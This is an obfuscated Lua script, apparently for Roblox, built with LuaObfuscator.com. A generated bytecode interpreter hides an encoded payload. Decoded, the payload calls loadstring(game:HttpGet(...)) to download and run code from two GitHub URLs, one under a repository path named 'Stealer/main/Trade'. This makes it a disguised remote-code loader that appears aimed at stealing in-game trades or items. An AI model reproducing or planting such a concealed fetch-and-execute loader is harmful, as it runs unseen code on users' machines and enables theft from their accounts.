--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v112=v5(v90,v19);v19=nil;return v112;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(878 -(282 + 595))) -(v32-(1 -(0 -0)))) + (2 -1))) ;return v91-(v91%1) ;else local v92=619 -(555 + (181 -(32 + 85))) ;local v93;while true do if (v92==(931 -(840 + 17 + 74))) then v93=(570 -(367 + 201))^(v32-(1066 -(68 + 997))) ;return (((v31%(v93 + v93))>=v93) and 1) or (927 -(48 + 166 + (1670 -(892 + 65)))) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (351 -(87 + 263)) ;v34=181 -(67 + 113) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(3 -2)) then return (v42 * ((9774056 + 7004112) -(802 + 150))) + (v41 * (176444 -110908)) + (v40 * ((609 -145) -208)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (1190 -(1069 + 118)) + 0 );v18=v18 + (1001 -(915 + 82)) ;v38=2 -1 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 -0)) then v46=1 + 0 ;v47=(v20(v45,1 -0 ,20) * ((2 + 0)^(823 -(368 + 423)))) + v44 ;v43=6 -4 ;end if (v43==(20 -((24 -14) + 8))) then v48=v20(v45,80 -59 ,473 -(416 + 2 + 24) );v49=((v20(v45,102 -(25 + 45) )==1) and  -(1 + 0)) or (1 -0) ;v43=(1326 -(261 + 624)) -(145 + 293) ;end if (v43==0) then v44=v23();v45=v23();v43=1;end if (v43==3) then if (v48==(430 -(44 + (685 -299)))) then if (v47==((2566 -(1020 + 60)) -(998 + (1911 -(630 + 793))))) then return v49 * (0 + 0) ;else v48=1 + 0 ;v46=772 -(201 + 571) ;end elseif (v48==((10792 -7607) -(116 + 1022))) then return ((v47==((0 -0) -0)) and (v49 * (1/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(3734 -2711) ) * (v46 + (v47/((7 -5)^(911 -(814 + 45))))) ;end end end local function v25(v50) local v51=0 + 0 ;local v52;local v53;while true do if (v51==(6 -4)) then v53={};for v113=1 + 0 , #v52 do v53[v113]=v2(v1(v3(v52,v113,v113)));end v51=1058 -(87 + 968) ;end if ((1750 -(760 + 987))==v51) then return v6(v53);end if (v51==(1914 -(1789 + 124))) then v52=v3(v16,v18,(v18 + v50) -(767 -(745 + (92 -71))) );v18=v18 + v50 ;v51=1 + 0 + 1 ;end if (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do local v111=(function() return 1665 -(970 + 695) ;end)();while true do if (v111==(0 -0)) then if (v103==(1991 -(582 + 1408))) then local v122=(function() return 0;end)();while true do if (v122~=(0 -0)) then else while true do if (v94~=(0 -0)) then else v95=(function() return v96();end)();if (v97(v95, #"}", #">")~=0) then else local v177=(function() return 0;end)();local v178=(function() return;end)();local v179=(function() return;end)();local v180=(function() return;end)();while true do if (v177~=(0 -0)) then else local v181=(function() return 0;end)();while true do if (v181~=1) then else v177=(function() return 1;end)();break;end if (v181==0) then v178=(function() return v97(v95,1826 -(1195 + 629) , #"asd");end)();v179=(function() return v97(v95, #"?id=",7 -1 );end)();v181=(function() return 1;end)();end end end if (v177==(242 -(187 + 54))) then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182==(780 -(162 + 618))) then v183=(function() return 0 + 0 ;end)();while true do if (v183==0) then local v188=(function() return 0 + 0 ;end)();while true do if (v188~=0) then else v180=(function() return {v98(),v98(),nil,nil};end)();if (v178==0) then local v189=(function() return 0 -0 ;end)();local v190=(function() return;end)();while true do if ((0 + 0)==v189) then v190=(function() return 1636 -(1373 + 263) ;end)();while true do if ((1000 -(451 + 549))==v190) then v180[ #"19("]=(function() return v98();end)();v180[ #".dev"]=(function() return v98();end)();break;end end break;end end elseif (v178== #"~") then v180[ #"19("]=(function() return v99();end)();elseif (v178==2) then v180[ #"nil"]=(function() return v99() -(2^16) ;end)();elseif (v178~= #"-19") then else local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v196) then v180[ #"-19"]=(function() return v99() -((2 -0)^(1400 -(746 + 638))) ;end)();v180[ #".com"]=(function() return v98();end)();break;end end break;end end end v188=(function() return 1 + 0 ;end)();end if (v188==1) then v183=(function() return 1 -0 ;end)();break;end end end if (v183==1) then v177=(function() return 343 -(218 + 123) ;end)();break;end end break;end end end if (v177==3) then if (v97(v179, #"-19", #"xnx")~= #"\\") then else v180[ #"asd1"]=(function() return v100[v180[ #".dev"]];end)();end v101[v102]=(function() return v180;end)();break;end if (v177==(1583 -(1535 + 46))) then if (v97(v179, #" ", #">")== #"[") then v180[2]=(function() return v100[v180[2 + 0 ]];end)();end if (v97(v179,2,2)== #"[") then v180[ #"19("]=(function() return v100[v180[ #"nil"]];end)();end v177=(function() return 1 + 2 ;end)();end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end if (v103~=(560 -(306 + 254))) then else local v123=(function() return 0;end)();while true do if (v123==(1 + 0)) then v103=(function() return 1 -0 ;end)();break;end if (v123==0) then v94=(function() return 0;end)();v95=(function() return nil;end)();v123=(function() return 1;end)();end end end break;end end end end;end)();local v55=(function() return function(v104,v105,v106) local v107=(function() return 1467 -(899 + 568) ;end)();while true do if (v107==(0 + 0)) then local v119=(function() return 0 -0 ;end)();while true do if (v119~=0) then else v104[v105-#"[" ]=(function() return v106();end)();return v104,v105,v106;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"<",v60 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if ((291 -(60 + 230))==v70) then v73=(function() return nil;end)();while true do if (v71==1) then if (v72== #".") then v73=(function() return v21()~=0 ;end)();elseif (v72==(574 -(426 + 146))) then v73=(function() return v24();end)();elseif (v72== #"nil") then v73=(function() return v25();end)();end v61[v69]=(function() return v73;end)();break;end if (v71==(0 + 0)) then local v121=(function() return 0;end)();while true do if (v121==(1457 -(282 + 1174))) then v71=(function() return 812 -(569 + 242) ;end)();break;end if (v121==(0 -0)) then v72=(function() return v21();end)();v73=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end end end end break;end if (v70~=0) then else v71=(function() return 1024 -(706 + 318) ;end)();v72=(function() return nil;end)();v70=(function() return 1252 -(721 + 530) ;end)();end end end v59[ #"xnx"]=(function() return v21();end)();for v74= #":",v23() do FlatIdent_61B23,Descriptor,v21,v20,v22,v23,v61,v56,v74=(function() return v54(FlatIdent_61B23,Descriptor,v21,v20,v22,v23,v61,v56,v74);end)();end for v75= #".",v23() do v57,v75,v28=(function() return v55(v57,v75,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[(1121 + 151) -(938 + 7 + 326) ];local v67=v63[(3 + 1) -(1 + 1) ];local v68=v63[3 + 0 ];return function(...) local v76=v66;local v77=v67;local v78=v68;local v79=v27;local v80=701 -(155 + 116 + 429) ;local v81= -(1 + 0);local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v108=0 -0 ,v84 do if (v108>=v78) then v82[v108-v78 ]=v83[v108 + (1087 -(461 + 625)) ];else v86[v108]=v83[v108 + (1289 -(993 + 295)) ];end end local v87=(v84-v78) + 1 + 0 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=(1181 -(418 + (2097 -1344)))) then if (v89<=4) then if (v89<=(1 + 0)) then if (v89==((0 -0) + 0)) then local v125=v88[1 + 1 ];local v126,v127=v79(v86[v125](v13(v86,v125 + 1 + 0 ,v88[532 -(406 + 123) ])));v81=(v127 + v125) -(1770 -(1749 + 20)) ;local v128=0;for v143=v125,v81 do local v144=0;while true do if ((v144==(0 + 0)) or (3755<915)) then v128=v128 + (1323 -(1249 + 73)) ;v86[v143]=v126[v128];break;end end end else local v129=0 + 0 + 0 ;local v130;while true do if (v129==(1145 -(466 + 679))) then v130=v88[4 -2 ];v86[v130]=v86[v130](v13(v86,v130 + (4 -3) ,v81));break;end end end elseif (v89<=(5 -(756 -(239 + 514)))) then for v145=v88[1902 -(106 + 631 + 1163) ],v88[(1330 -(797 + 532)) + 2 ] do v86[v145]=nil;end elseif (v89==(1 + 2 + 0)) then v80=v88[8 -5 ];else do return;end end elseif ((3946>3743) and (v89<=(18 -11))) then if (v89<=(119 -(4 + 110))) then if ((v86[v88[586 -(20 + 37 + 527) ]]==v88[1431 -((96 -55) + 1386) ]) or (1938>4935)) then v80=v80 + 1 ;else v80=v88[3];end elseif ((v89>6) or (1335>=3306) or (4255<3423)) then v86[v88[105 -(17 + 86) ]]();else v86[v88[(1204 -(373 + 829)) + 0 ]]=v88[6 -(734 -(476 + 255)) ];end elseif (v89<=8) then v86[v88[5 -3 ]]();elseif (v89==(175 -(122 + 44))) then if (v86[v88[2 -0 ]]==v88[4]) then v80=v80 + (3 -2) ;else v80=v88[3];end else v86[v88[2 + 0 ]]=v65[v88[1 + 2 ]];end elseif ((4844>2253) and (v89<=(30 -15))) then if (v89<=12) then if ((452==452) and (v89>(76 -(30 + 35)))) then local v131=v88[2 + (1130 -(369 + 761)) ];local v132,v133=v79(v86[v131](v13(v86,v131 + (1258 -(1043 + 214)) ,v88[3])));v81=(v133 + v131) -(3 -2) ;local v134=1212 -(323 + 889) ;for v147=v131,v81 do v134=v134 + (2 -1) ;v86[v147]=v132[v134];end else local v135=580 -(361 + 219) ;local v136;local v137;while true do if (v135==(321 -(53 + 267))) then v86[v136 + 1 + 0 + (0 -0) ]=v137;v86[v136]=v137[v88[417 -(15 + 398) ]];break;end if (v135==(982 -(18 + (1826 -862)))) then v136=v88[7 -5 ];v137=v86[v88[2 + 1 ]];v135=1 + 0 ;end end end elseif (v89<=13) then local v138=v88[2];v86[v138]=v86[v138](v13(v86,v138 + (851 -((258 -(64 + 174)) + 830)) ,v81));elseif ((v89>(11 + 3)) or (4557<2087)) then v86[v88[128 -(116 + 10) ]]=v88[1 + 2 ]~=0 ;else v80=v88[1 + 2 ];end elseif ((1454<=2491) and (v89<=(756 -(542 + 196)))) then if ((v89<=(34 -18)) or (4157<=2803)) then v86[v88[1 + 1 ]]=v65[v88[2 + 1 ]];elseif ((4853>=2982) and (3874==3874) and (v89==(7 + 10))) then for v172=v88[4 -2 ],v88[(10 -3) -4 ] do v86[v172]=nil;end else do return;end end elseif (v89<=(1570 -(1126 + 425))) then v86[v88[(743 -(144 + 192)) -(118 + 287) ]]=v88[11 -8 ]~=(1121 -((334 -(42 + 174)) + 1003)) ;elseif (v89>(58 -38)) then local v158=v88[379 -(142 + 235) ];local v159=v86[v88[13 -10 ]];v86[v158 + 1 + 0 ]=v159;v86[v158]=v159[v88[(737 + 244) -(553 + 424) ]];else v86[v88[2]]=v88[5 -2 ];end v80=v80 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5461646173682D31302F537465616C65722F6D61696E2F547261646503553O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F79737469636B706C6179732F707379636869632D6F63746F2D696E76656E74696F6E2F6D61696E2F796172686D2E6C7561001B3O0012063O00014O0011000100013O0026093O0002000100010004033O00020001001206000100013O00260900010005000100010004033O0005000100120A000200023O00120A000300033O00200B000300030004001206000500054O000C000300054O000100023O00022O000800020001000100120A000200023O00120A000300033O00200B000300030004001206000500064O001300066O000C000300064O000100023O00022O00080002000100010004033O001A00010004033O000500010004033O001A00010004033O000200012O00123O00017O00",v9(),...);
